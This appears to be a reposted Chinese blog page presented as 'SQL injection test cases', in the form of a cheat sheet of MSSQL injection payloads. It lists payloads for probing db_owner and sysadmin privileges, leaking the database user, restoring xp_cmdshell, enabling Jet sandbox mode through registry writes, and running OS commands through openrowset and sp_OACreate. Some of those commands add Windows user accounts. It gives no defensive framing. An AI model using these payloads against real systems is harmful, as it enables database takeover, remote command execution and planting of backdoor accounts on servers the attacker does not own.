软件注入攻击测试,SQL注入测试用例

//看看是什么权限的

and 1=(Select IS_MEMBER(‘db_owner’))

And char(124)%2BCast(IS_MEMBER(‘db_owner’) as varchar(1))%2Bchar(124)=1 ;–

//检测是否有读取某数据库的权限

and 1= (Select HAS_DBACCESS(‘master’))

And char(124)%2BCast(HAS_DBACCESS(‘master’) as varchar(1))%2Bchar(124)=1 —

数字类型

and char(124)%2Buser%2Bchar(124)=0

字符类型

‘ and char(124)%2Buser%2Bchar(124)=0 and ”=’

搜索类型

‘ and char(124)%2Buser%2Bchar(124)=0 and ‘%’=’

爆用户名

and user>0

‘ and user>0 and ”=’

检测是否为SA权限

and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–

And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 —

检测是不是MSSQL数据库

and exists (select * from sysobjects);–

检测是否支持多行

;declare @d int;–

恢复 xp_cmdshell

;exec master..dbo.sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll’;–

select * from openrowset(‘sqloledb’,’server=192.168.1.200,1433;uid=test;pwd=pafpaf’,’select @@version’)

//———————–

//      执行命令

//———————–

首先开启沙盘模式:

exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftJet4.0Engines’,’SandBoxMode’,’REG_DWORD’,1

然后利用jet.oledb执行系统命令

select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:winntsystem32iasias.mdb’,’select shell(“cmd.exe /c net user admin admin1234 /add”)’)

执行命令

;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:WINNTsystem32cmd.exe /c net user paf pafpaf /add’;–

EXEC [master].[dbo].[xp_cmdshell] ‘cmd /c md c:1111’

判断xp_cmdshell扩展存储过程是否存在:

http://192.168.1.5/display.aspeyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’)

21/212>

文章知识点与官方知识档案匹配,可进一步学习相关知识MySQL入门技能树SQL高级技巧CTE和递归查询31556 人正在系统学习中 相关资源:桌面开满999朵玫瑰花软件绿色版.rar-其它代码类资源-CSDN文库

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2021年6月22日
下一篇 2021年6月22日

相关推荐